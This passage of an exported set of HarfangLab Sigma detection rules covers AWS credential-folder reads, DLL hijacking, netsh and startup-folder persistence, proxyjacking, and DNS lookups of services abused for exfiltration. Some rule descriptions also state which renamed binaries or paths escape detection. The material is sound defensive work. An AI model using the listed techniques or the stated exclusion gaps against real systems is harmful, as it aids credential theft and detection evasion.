'/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: 
'/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup software ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_misc_tools:\n ProcessImage|contains:\n - 'python'\n - 'ruby'\n - 'node'\n - 'terraform'\n - 'starship' # https://github.com/starship/starship\n - '/terragrunt'\n - '/usr/bin/awk'\n - '/Users/*/.local/bin/zsh (qterm)'\n - 'steampipe-plugin-aws.plugin'\n - 'nvim'\n - 'awk'\n - 'grep'\n - '/usr/bin/vim'\n\n exclusion_visualcode:\n - Image: '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - ProcessAncestors|contains: 'Visual Studio Code.app/Contents/MacOS/Electron'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_flintrock:\n Image:\n - 
'/Users/*/Flintrock-*-standalone-macOS-arm64/flintrock'\n - '/usr/local/bin/flintrock-*-standalone-macos-arm64/flintrock'\n - '/usr/local/bin/flintrock-*-standalone-macOS-x86_64/flintrock'\n\n exclusion_dotnet:\n Image: '/usr/local/share/dotnet/dotnet'\n\n exclusion_sops:\n Image: '/opt/homebrew/Cellar/sops/*/bin/sops'\n\n exclusion_rider:\n ProcessParentImage:\n - '/Applications/Rider.app/Contents/lib/ReSharperHost/macos-arm64/JetBrains.Debugger.Worker'\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n\n exclusion_orb:\n Image: '/Volumes/Install OrbStack v*/OrbStack.app/Contents/Frameworks/OrbStack Helper.app/Contents/MacOS/OrbStack Helper'\n\n exclusion_sed:\n Image: '/usr/bin/sed'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.sed'\n\n exclusion_claude:\n Image: '/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n ProcessParentImage: '/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n ProcessAncestors|contains: '|/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n\n exclusion_kiro:\n ProcessGrandparentImage: '/Applications/Kiro.app/Contents/Frameworks/Kiro Helper.app/Contents/MacOS/Kiro Helper'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fae7a83d-e36c-4641-801d-5ce8281bd8a8",
"rule_name": "Suspicious Read Access to User's AWS Configuration Folder",
"rule_description": "Detects an attempt to read the contents of the AWS configuration folder.\nAdversaries may access a user's AWS configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify whether the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "faed7270-aa37-490a-818a-c476a47af917",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608118Z",
"creation_date": "2026-03-23T11:45:34.608122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608129Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide"
],
"name": "windows_defender_eventid_1117.yml",
"content": "title: Windows Defender has Taken Action against Malware\nid: faed7270-aa37-490a-818a-c476a47af917\ndescription: |\n Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\nreferences:\n - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\ndate: 2021/10/29\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.credential_access\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.Generic\nlogsource:\n product: windows\n service: defender\ndetection:\n selection:\n EventID: 1117\n Source: Microsoft-Windows-Windows Defender\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "faed7270-aa37-490a-818a-c476a47af917",
"rule_name": "Windows Defender has Taken Action against Malware",
"rule_description": "Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\n",
"rule_creation_date": "2021-10-29",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fb14f890-84e4-4f00-9b82-2a6e82a275f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098003Z",
"creation_date": "2026-03-23T11:45:34.098005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098009Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7avmscn.yml",
"content": "title: DLL Hijacking via K7AVMScn.exe\nid: fb14f890-84e4-4f00-9b82-2a6e82a275f2\ndescription: |\n Detects potential Windows DLL Hijacking via K7AVMScn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7AVMScn.exe'\n ImageLoaded|endswith: '\\K7AVWScn.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fb14f890-84e4-4f00-9b82-2a6e82a275f2",
"rule_name": "DLL Hijacking via K7AVMScn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7AVMScn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbb59af6-3665-49a3-9ebb-8c2b47ebd651",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071580Z",
"creation_date": "2026-03-23T11:45:34.071582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1546_007_persistence_netsh_dll.yml",
"content": "title: Netsh Helper DLL Persistence Added\nid: fbb59af6-3665-49a3-9ebb-8c2b47ebd651\ndescription: |\n Detects a suspicious persistence via netsh helper DLL.\n Netsh is a Windows utility which can be used by administrators to perform tasks related to the network configuration of a system.\n This functionality can be extended with the usage of DLL files and can be used by attackers to load arbitrary DLL’s to achieve code execution and persistence.\n It is recommended to ensure the legitimacy of the DLL specified in the registry.\nreferences:\n - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/04/14\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.007\n - attack.s0108\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Example: \"HKLM\\SOFTWARE\\Microsoft\\NetSh\\my malicious entry\"\n TargetObject|contains: 'HKLM\\Software\\Microsoft\\NetSh\\'\n\n exclusion_library:\n Details:\n - 'authfwcfg.dll'\n - 'dhcpcmonitor.dll'\n - 'dhcpmon.dll'\n - 'fwcfg.dll'\n - 'hnetmon.dll'\n - 'iasmontr.dll'\n - 'ipmontr.dll'\n - 'ippromon.dll'\n - 'netiohlp.dll'\n - 'netprofm.dll'\n - 'nettrace.dll'\n - 'nshdnsclient.dll'\n - 'nshhttp.dll'\n - 'nshipsec.dll'\n - 'nshwfp.dll'\n - 'peerdistsh.dll'\n - 'rasmontr.dll'\n - 'rpcnsh.dll'\n - 'WcnNetsh.dll'\n - 'whhelper.dll'\n - 'wshelper.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbb59af6-3665-49a3-9ebb-8c2b47ebd651",
"rule_name": "Netsh Helper DLL Persistence Added",
"rule_description": "Detects suspicious persistence via a netsh helper DLL.\nNetsh is a Windows utility which can be used by administrators to perform tasks related to the network configuration of a system.\nThis functionality can be extended with the usage of DLL files and can be used by attackers to load arbitrary DLLs to achieve code execution and persistence.\nIt is recommended to ensure the legitimacy of the DLL specified in the registry.\n",
"rule_creation_date": "2021-04-14",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbd1dd7f-e811-4e68-a60e-275829775734",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603580Z",
"creation_date": "2026-03-23T11:45:34.603584Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603591Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1090/004/",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1102_002_susp_domain_dns.yml",
"content": "title: Suspicious Domain Name Resolved\nid: fbd1dd7f-e811-4e68-a60e-275829775734\ndescription: |\n Detects a DNS resolution of web services commonly abused by attackers to stage malicious binaries or exfiltrate data (trycloudflare.com, pages.dev, w3spaces.com, workers.dev) by a process that is not covered by the rule's exclusions (browsers, binaries under Program Files and a few Windows components).\n Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\n It is recommended to check if the process has a legitimate reason to communicate with the service.\n Note that several browser exclusions (e.g. vivaldi.exe, thorium.exe, chromium.exe, jxbrowser) match on the image path alone with no signature check, so a renamed binary placed under a matching path is not alerted on; keep this in mind when tuning.\nreferences:\n - https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1090/004/\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2024/09/10\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1090.004\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.trycloudflare.com'\n - '.pages.dev'\n - '.w3spaces.com'\n - '.workers.dev'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n 
exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_misc_browser:\n - Image|endswith: '\\brave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n - Image|endswith: '\\Application\\vivaldi.exe'\n - Image|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Opera Norway AS'\n - 'Opera Software AS'\n - Image|endswith: '\\Chromium\\thorium.exe'\n - Image|endswith: '\\SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n - Image|endswith:\n - '\\chromium\\chromium.exe'\n - '\\Chromium\\Application\\chrome.exe'\n - '\\GoogleChromePortable\\App\\Chrome-bin\\chrome.exe'\n - Image|endswith:\n - '\\jxbrowser\\chromium.exe'\n - '\\jxbrowser64\\chromium.exe'\n - ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n - Image|endswith: '\\MicrosoftEdgeCP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_ublock:\n QueryName:\n - 'ublockorigin.pages.dev'\n - 'malware-filter.pages.dev'\n - 'phishing-filter.pages.dev'\n\n exclusion_speedtest:\n ProcessName: 'speedtest.exe'\n QueryName: 'orus.pages.dev'\n\n exclusion_genapi:\n Image|endswith: '\\GenApi.iNot.Client.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'GENAPI (Septeo Solutions Notaires SAS)'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of 
exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbd1dd7f-e811-4e68-a60e-275829775734",
"rule_name": "Suspicious Domain Name Resolved",
"rule_description": "Detects a DNS resolution of web services commonly abused by attackers to stage malicious binaries or exfiltrate data (trycloudflare.com, pages.dev, w3spaces.com, workers.dev) by a process that is not covered by the rule's exclusions (browsers, binaries under Program Files and a few Windows components).\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\nIt is recommended to check if the process has a legitimate reason to communicate with the service.\nNote that several browser exclusions (e.g. vivaldi.exe, thorium.exe, chromium.exe, jxbrowser) match on the image path alone with no signature check, so a renamed binary placed under a matching path is not alerted on; keep this in mind when tuning.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1090.004",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbd6b8c0-1a30-46d6-8622-3e3f251c8be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613658Z",
"creation_date": "2026-03-23T11:45:34.613662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613669Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_speedshare.yml",
"content": "title: SpeedShare Executed\nid: fbd6b8c0-1a30-46d6-8622-3e3f251c8be0\ndescription: |\n Detects the SpeedShare command-line client being started (spdcli connect -p ...). SpeedShare is a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform proxyjacking, a form of abuse in which an attacker hijacks a victim's Internet connection and resells it as a proxy, for malicious purposes or illegal monetization.\n It is recommended to verify whether the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.SpeedShare\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '/spdcli connect -p '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbd6b8c0-1a30-46d6-8622-3e3f251c8be0",
"rule_name": "SpeedShare Executed",
"rule_description": "Detects the SpeedShare command-line client being started (spdcli connect -p ...). SpeedShare is a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform proxyjacking, a form of abuse in which an attacker hijacks a victim's Internet connection and resells it as a proxy, for malicious purposes or illegal monetization.\nIt is recommended to verify whether the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc3a404c-7d79-4d07-975a-c7ccf40276cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620449Z",
"creation_date": "2026-03-23T11:45:34.620451Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620455Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_file_startup.yml",
"content": "title: File Added/Modified in Startup Directory\nid: fc3a404c-7d79-4d07-975a-c7ccf40276cf\ndescription: |\n Detects when a file is added or modified in a per-user or all-users Startup directory.\n Adversaries may achieve persistence by adding a program, or a shortcut to one, to a startup folder.\n It is recommended to investigate the content of the newly created file to determine if this action was legitimate.\n Note that this rule carries broad exclusions: any image under Program Files, svchost.exe (pending command-line fields for this event), and any activity whose ancestor, parent, command line or target path is a UNC path. A persistence file dropped through one of these will not alert.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n ProcessParentImage|startswith: '?:\\'\n\n filter_directory:\n Path|endswith:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp'\n\n exclusion_bad_extensions:\n Path|endswith:\n # ransomware activity for instance (\\!!!_READ_ME_A327C166_!!!.txt)\n - '.txt'\n - 'desktop.ini'\n - '\\bginfo.lnk'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n 